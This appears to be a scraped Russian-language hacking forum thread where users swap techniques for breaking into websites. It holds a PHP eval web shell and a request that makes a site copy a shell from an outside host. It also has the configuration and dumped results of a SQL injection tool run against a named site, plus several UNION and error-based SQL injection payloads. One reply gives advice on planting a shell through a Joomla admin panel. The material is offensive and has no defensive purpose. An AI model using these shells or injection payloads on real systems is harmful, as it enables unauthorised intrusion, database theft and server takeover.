льешь <?php eval(stripslashes($_GET[id])); ?> http://site.ru/shell.php?id=copy('http://google.ru/shell.php','/куда/лить/shell.php');
Code: $method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET $f_table = "information_schema.tables"; # $f_url = "http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+"; # url $f_plus = "+"; # %20,%2b & etc. $f_filtr = "a)--+&cat=exploits"; # close SQL ----------------------------------------- System information: ----------------------------------------- base:hack0wn basedir:/usr/ datadir:/var/lib/mysql/ os:redhat-linux-gnu tmpdir:/tmp/ ver:5.0.86-log ----------------------------------------- Tables in information_schema.tables - 27 ----------------------------------------- ROUTINES VIEWS SCHEMA_PRIVILEGES advisories SCHEMATA bins PROFILING exploits KEY_COLUMN_USAGE comments COLLATIONS TABLE_CONSTRAINTS profiles COLUMN_PRIVILEGES TABLE_PRIVILEGES shellcodes COLUMNS TRIGGERS sources CHARACTER_SETS TABLES papers COLLATION_CHARACTER_SET_APPLICABILITY USER_PRIVILEGES videos STATISTICS misc https://forum.antichat.net/thread148915-toolza.html
раскрутил скулю Postgresql, залил шелл..но на сервере крутится еще и MySQL.. как мне к базе с постгре подключится? к мускулю подключение нормальноe
Есть иньекция, но в интересных условиях. В кратце: уязвимый параметр используется в нескольких запросах. Скрипт выплевывает данные только после успешной обработки всех запросов. Проблема в том, что количество столбцов в запросах разное. Т.е. подбираешь количество столбцов в первом в запросе, он выполняется, а на следующем скрипт крэшится. Из вывода в итоге получаются только ошибки, скрипт просто не дорабатывает до конца. PHP: http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5--+ PHP: MySQL error occured on line 68 in file index.php. Error 1222: The used SELECT statements have a different number of columns Query: [..query2..] PHP: http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--+ PHP: MySQL error occured on line 21 in file index.php. Error 1222: The used SELECT statements have a different number of columns Query: [..query1..] Any ideas?
Все правильно делаю? Ошибку не выдает, пишет item not found, т.е. сам скрипт что-то отлавливает и не выводит MySQL'ную ошибку? PHP: index.php?id=-1+union+select+count(*),concat(version(),floor(rand(0)*2)),3,4,5,6,7,8,9,10,11+x+from+users+group+by+x--+ где users - существующая таблица.
tak probuy http://site.com/index.php?cat=(select*from(select+name_const(version(),1),name_const(version(),1))a)
Работает, но уже не работает: Error 1210: Incorrect arguments to NAME_CONST Либо я не понял принципа, либо в чем-то другом проблема?
Пипл, кто юзал Joomla! 1.0.15 Lavra Edition 2008 подскажите как шел залить... Или php код воспроизвести!!
в джумле легко шелл залить если есть доступ в админку, устанавливаешь там модуль джумла ксплорер и через него уже спокойно делаешь свои дела
